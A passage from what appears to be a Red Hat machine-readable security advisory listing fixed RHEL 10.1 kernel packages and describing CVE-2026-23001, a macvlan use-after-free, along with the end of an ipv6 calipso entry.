"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()"
},
{
"cve": "CVE-2026-23001",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2026-01-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2432664"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: macvlan: fix possible UAF in macvlan_forward_source()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A use-after-free can occur in macvlan source-mode forwarding when a source hash entry is deleted while the transmit/forwarding path still dereferences entry.vlan without proper RCU protection. A local attacker who can configure macvlan networking can race deletion with packet processing to crash the kernel and potentially achieve memory corruption.\nExploitation typically requires the CAP_NET_ADMIN capability (often within a user namespace).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
